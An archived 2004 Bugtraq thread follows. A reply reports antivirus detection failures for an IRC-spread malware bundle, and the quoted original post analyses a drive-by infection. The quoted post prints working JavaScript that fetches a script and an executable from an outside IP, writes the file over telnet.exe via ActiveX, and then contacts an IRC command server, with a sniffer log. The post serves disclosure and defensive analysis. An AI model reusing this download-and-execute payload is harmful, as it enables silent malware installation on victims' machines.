 
Bugtraq mailing list archives
RE: New IRC Trojan -Symantec and Trend Micro Unable To Stop Infection
From: "Romulo M. Cholewa" <rmc () rmc eti br>
Date: Mon, 14 Jun 2004 18:01:45 -0300
Interesting, I hope this is NOT a trend or new policy. On friday 4th 13:34 -0300 GMT, I sent to the focus-virus list a message about a new malware of some sort, that was not being detected by Symantec AV Corporate (Client Security with 02/06/2004 rev. 17 - now, with defs. from 13/06/2004 rev. 17, still NO detection, no action). The code is named "d0r1t1s" as it arrived to me. The message was not "acted upon" and didn't make to the list. I sent the message to Mr. Mark Fossi on sat 05/06/2004 12:06 -03:00 GMT, received no reply so far. back to business. I was having a discussion earlier this month with a friend about malware not being detected by major AV vendor products, when he said to me that he had a code (a rootkit of some sort) that was not being detected by Symantec products, and that was spreading fast through IRC (IRC is very popular here in Brazil). I asked him to send the file in, and it got through Symantec AV for gateways AND Symantec Client Security. so far, the file (rar packed) is sitting here at my desktop without being detected by realtime protection or manual / scheduled scans. It's even more interesting to see google results: http://www.google.com/search?hl=en&ie=UTF-8&q=d0r1t1s&btnG=Google+Search Like I said in my previrous emails, I would sleep better at night if I see this code analyzed and properly detected. According to my friend, Kaspersky and McAfee based products are detecting the threat so far. [from the message he sent to me stating that Kapersky detected it]: D:\temp\d0r1t1s.rar/d0r1t1s.exe/dorod.exe Infected Backdoor.HacDef.084 D:\temp\d0r1t1s.rar/d0r1t1s.exe/niamx Infected Worm.Win32.Randon D:\temp\d0r1t1s.rar/d0r1t1s.exe/ppi.exe Infected Backdoor.MotivFTP.12 D:\temp\d0r1t1s.rar/d0r1t1s.exe/redroses Infected Backdoor.IRC.Zapchast D:\temp\d0r1t1s.rar/d0r1t1s.exe/wexp.exe Infected Exploit.Win32.RPCLsa.01.c RAV Antivirus Online file Scan results (as of 14/06/2004 10:00 -03:00 GMT): d0r1t1s.rar->d0r1t1s.exe->(CABSfx)->dir32.exe->(CExe) is infected with Tool:HideWindows d0r1t1s.rar->d0r1t1s.exe->(CABSfx)->dorod.exe->(FSGPE) is infected with Backdoor:Win32/Hackdef.0_84 d0r1t1s.rar->d0r1t1s.exe->(CABSfx)->niamx is suspicious of IRC/Generic* d0r1t1s.rar->d0r1t1s.exe->(CABSfx)->ppi.exe->(UPXW) is infected with Backdoor:Win32/MotivFTP.1_2 d0r1t1s.rar->d0r1t1s.exe->(CABSfx)->van32.exe->(FSGPE) is infected with Trojan:Win32/HideWindow (only the reported infected files shown to keep it readable) Regards, Romulo M. cholewa Home: http://www.rmc.eti.br News: http://www.rmc.eti.br/news PGP key id 0x7F8A3B40 ] -----Original Message----- ] From: Rusty Chiles [mailto:rustychiles () cox net] ] Sent: Thursday, June 03, 2004 7:35 PM ] To: bugtraq () securityfocus com ] Subject: New IRC Trojan -Symantec and Trend Micro Unable To ] Stop Infection ] ] It seems that a new trojan is making the rounds on irc. ] Nobody else seems to have figured it out yet, as there is no ] antivirus pattern out. ] ] It seems that things on this list get attention quicker, and ] my virus case hasn't even been looked at yet from any av ] vendor. I'd like to post what i've found to speed the process up. ] ] While on irc, a client posted a link to the following url. ] I was on a fully patched windows xp sp1 box at the time with ] up to date virus scan. (Symantec AV 2004) ] ] I click the url, and see a picture, and a mini popup window. ] Thought it to be strange, but nothing else of it at the time. ] ] **THIS URL IS NOT SAFE** DO NOT CLICK ] http:-//www.teamwwindy.com/thekiss.jpg ] **THIS URL IS NOT SAFE** DO NOT CLICK ] ] ] ** UPDATE *** ] I am seeing this spread from clients posting a new url today ] as well http:-//www.rvsgroups.com/nfos/DOOM.III-DEViANCE/ ] ** DO NOT GO TO THIS URL UNLESS YOU WANT TO BE INFECTED ** ] ] (ps links are broken with - intentionally to prevent infection) ] ] ] Symantec on latest pattern detects nothing. ] Trend Micro internet security detects some sort of javacript ] Exploit; however in this case the payload still infected the ] machine using trend. ] ] The web exploit that installs the payload runs this ] javascript code code --------------snip ] ----------------snip-------------------snip-------------- ] --------------------------- ] function getRealShell() { ] myiframe.document.write("<SCRIPT ] SRC='http://66.119.180.10:8080/shellscript.js'><\/SCRIPT>"); ] } ] ] document.write("<IFRAME ID=myiframe SRC='about:blank' ] WIDTH=200 HEIGHT=200></IFRAME>"); setTimeout("getRealShell()",100); ] ] --------------snip ] ----------------snip-------------------snip-------------- ] --------------------------- ] the file shellscript(1).js file is downloaded shellscript.js ] is run contains this code ] ] --------------snip ] ----------------snip-------------------snip-------------- ] --------------------------- ] var downloadurl="http://66.119.180.10:8080/a.exe"; ] ] if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1) ] savetopath="C:\\WINDOWS\\system32\\telnet.exe"; ] if(navigator.appVersion.indexOf("Windows NT 5.0")!=-1) ] savetopath="C:\\WINNT\\system32\\telnet.exe"; ] ] payloadURL = downloadurl; ] var x = new ActiveXObject("Microsoft.XMLHTTP"); ] x.Open("GET",payloadURL,0); ] x.Send(); ] ] function bla() { return "A" + "D" + "O" + "D" + "B" + "." + ] "S" + "t" + "r" ] + "e" + "a" + "m"; } ] ] var s = new ActiveXObject(bla()); ] s.Mode = 3; ] s.Type = 1; ] s.Open(); ] s.Write(x.responseBody); ] s.SaveToFile(savetopath,2); ] ] location.href = "telnet://"; ] ] --------------snip ] ----------------snip-------------------snip-------------- ] --------------------------- ] At this point I see a process telnet.exe is in the task ] manager. This is the a.exe file that was downloaded by ] shellscript.js moved to c:\windows\telnet.exe or telnet.bak ] ] (something to do with windows file protection I believe) ] ] (note a registry key was also made to rename telnet.bak to ] telnet.exe on the next boot........ giving you a version of ] telnet that is actually a ] backdoor) (there is also a runonce reg key made to msmsgr.exe ] which is also just a copy of the a.exe file that the earlier ] javascript exploit copied up) ] ] Now once the payload has executed (a.exe or telnet.exe) ] ] It connects to this irc server 66-119-180-10.van.zoolink.com:6667 ] Here's a sniffer dump of the first few seconds. ] ] NICK zapvc ] USER zxayd 0 0 :zapvc ] :irc.server NOTICE zapvc :*** If you are having problems ] connecting due to ping timeouts, please type /quote pong ] 81863547 or /raw pong 81863547 now. ] PING :81863547 ] PONG 81863547 ] :IRC!IRC@irc.server PRIVMSG zapvc :VERSION :irc.server 001 ] zapvc :Welcome to the Private IRC Network ] zapvc!zxayd () mydomain changed com :irc.server 002 zapvc :Your ] host is irc.server, running version ] Unreal3.2-beta19 ] :irc.server 003 zapvc :This server was created Mon Jan 12 ] 15:18:40 2004 :irc.server 004 zapvc irc.server ] Unreal3.2-beta19 iowghraAsORTVSxNCWqBzvdHtGp ] lvhopsmntikrRcaqOALQbSeKVfMGCuzN :irc.server 005 zapvc MAP ] KNOCK SAFELIST HCN MAXCHANNELS=5 MAXBANS=60 NICKLEN=30 ] TOPICLEN=307 KICKLEN=307 MAXTARGETS=20 AWAYLEN=307 :are ] supported by this server :irc.server 005 zapvc WALLCHOPS ] WATCH=128 SILENCE=5 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ ] CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSM NETWORK=Private ] CASEMAPPING=ascii :are supported by this server :irc.server ] 251 zapvc :There are 922 users and 2 invisible on 1 servers ] :irc.server 254 zapvc 5 :channels formed :irc.server 255 ] zapvc :I have 924 clients and 0 servers :irc.server 265 zapvc ] :Current Local Users: 924 Max: 1719 :irc.server 266 zapvc ] :Current Global Users: 924 Max: 926 JOIN #desk :irc.server ] 422 zapvc :MOTD File is missing USERHOST zapvc JOIN #desk ] USERHOST zapvc JOIN #desk USERHOST zapvc ] :zapvc!zxayd@ip68-2-130-81. () mydomain changed com JOIN :#desk ] :irc.server 332 zapvc #desk :.mirc spread stop :irc.server ] 333 zapvc #desk spn 1087025036 :irc.server 353 zapvc @ #desk ] :zapvc @spn @_p_ :irc.server 366 zapvc #desk :End of /NAMES list. ] PRIVMSG #desk : ] :irc.server 302 zapvc :zapvc=+zxayd () mydomain changed com ] :irc.server 302 zapvc :zapvc=+zxayd () mydomain changed com ] :irc.server 302 zapvc :zapvc=+zxayd () mydomain changed com ] :irc.server 412 zapvc :No text to send ] ] If I manually join #desk ] -------------------------------------------------------------- ] -------------- ] ---------------------- ] You are now talking on #desk ] --- Topic for #desk is .mirc spread stop ] --- Topic for #desk set by spn at Sat Jun 12 00:23:56 ] ] From the topic it looks like .mirc spread stop is a remote ] control command to stop the spread. I am unsure what other ] commands are available to those who are controlling the trojan. ] ] It is hikacking the MIRC client of the person infected and ] using this functionality to spread by messaging clients with ] the url of the website that the infection occurs from. ] ] As of this morning the channel #desk is unoccupied. The irc ] server is still up, no public channels, and a client ] connection count of about 800. ] ] I submitted samples to trend micro, and wanted to submit to ] symantec but their submission process is overly complicated ] since I no longer had their product installed I couldn't ] submit samples. ] ] Abuse departments where the webpage resides, as well as the ] irc server resides have been contacted, but no action has ] been taken thus far. ] ] ]
Current thread:
- RE: New IRC Trojan -Symantec and Trend Micro Unable To Stop Infection Romulo M. Cholewa (Jun 14)
- <Possible follow-ups>
- RE: New IRC Trojan -Symantec and Trend Micro Unable To Stop Infection Drew Copley (Jun 14)
 


